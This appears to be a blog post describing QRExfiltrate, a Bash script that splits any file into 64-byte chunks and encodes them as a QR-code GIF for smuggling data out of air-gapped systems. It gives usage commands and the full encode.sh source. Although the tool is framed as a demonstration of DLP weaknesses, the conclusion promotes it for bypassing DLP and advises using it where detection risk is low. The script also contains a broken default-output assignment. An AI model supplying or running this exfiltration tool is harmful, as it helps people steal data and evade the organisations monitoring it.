During the search for recent technics and trendings used by hackers for data extraction, I ran across an interesting tool that uses QR code video to decode binary data of files and then reassemble this data using QR code reading apps.

This interesting proof of concept was developed by HackGit using a Bash shell script named QRExfiltrate.

This tool is a command line utility that allows you to convert any binary file into a QRcode GIF. The data can then be reassembled visually allowing the exfiltration of data in air-gapped systems. It was designed as a proof of concept to demonstrate weaknesses in DLP software; that is, the assumption that data will leave the system via email, USB sticks, or other media.

The tool works by taking a binary file and converting it into a series of QR code images. These images are then combined into a GIF file that can be easily reassembled using any standard QR code reader. This allows data to be exfiltrated without detection from most DLP systems.

To use QRExfiltrate, open a command line and navigate to the directory containing the QRExfiltrate scripts.

Once you have done this, you can run the following command to convert your binary file into a QRcode GIF:

./encode.sh ./draft-taddei-ech4ent-introduction-00.txt output.gif

Demo

encode.sh <inputfile>

Where <inputfile> is the path to the binary file you wish to convert, and <outputfile>, if no output is specified output.gif used is the path to the desired output GIF file.

Once the command completes, you will have a GIF file containing the data from your binary file.

You can then transfer this GIF file as you wish and reassemble the data using any standard QR code reader.

Prerequisites

QRExfiltrate requires the following prerequisites:

• qrencode
• ffmpeg

Limitations

QRExfiltrate is limited by the size of the source data, qrencoding per frame has been capped at 64 bytes to ensure the resulting image has a uniform size and shape. Additionally, the conversion to QR code results in a lot of storage overhead, on average the resulting gif is 50x larger than the original. Finally, QRExfiltrate is limited by the capabilities of the QR code reader. If the reader is not able to detect the QR codes from the GIF, the data will not be able to be reassembled.

encode.sh

#!/bin/bash
# requires qrencode and ffmpeg

# get file from input
file="$1"
output="$2"

# check if 2nd argument is provided
if [ -z "$output" ]; then
    output = "output.gif"
fi

# check if the file exists
if [ ! -f "$file" ]; then
    echo "File not found"
    exit 1
fi

# get size of file in bytes
# filesize=$(stat -f "%z" "$file" || stat -c%s "$file")
if [ "$(uname)" == "Darwin" ]; then
    filesize=$(stat -f "%z" "$file")
else
    filesize=$(stat -c%s "$file")
fi

# calculate size of each chunk
chunksize=64

# determine number of chunks
nchunks=$((filesize/chunksize))

# create chunks
echo "Creating chunks..."
for i in $(seq 0 $nchunks); do
    dd if="$file" of=chunk_"$i" bs="$chunksize" skip="$i" count=1
    echo "Created chunk $i"
done

# generate qrcode images
echo "Generating qrcodes..."
for i in $(seq 0 $nchunks); do
    qrencode -t png -o frame_"$i".png < chunk_"$i" -s 8
    echo "Generated qrcode $i"
done

# combine qrcode images into gif
echo "Creating gif..."
if [ "$(uname)" == "Darwin" ]; then
    ffmpeg -y -r 10 -i frame_%d.png $output
else
    ffmpeg  -i frame_%d.png $output  -y -r 10
fi

# clean up
echo "Cleaning up..."
rm -f chunk_*
rm -f frame_*

echo "Done!"

Conclusion

QRExfiltrate is a powerful tool that can be used to bypass DLP systems and exfiltrate data in air-gapped networks. However, it is important to note that QRExfiltrate should be used with caution and only in situations where the risk of detection is low.

Credits: HackGit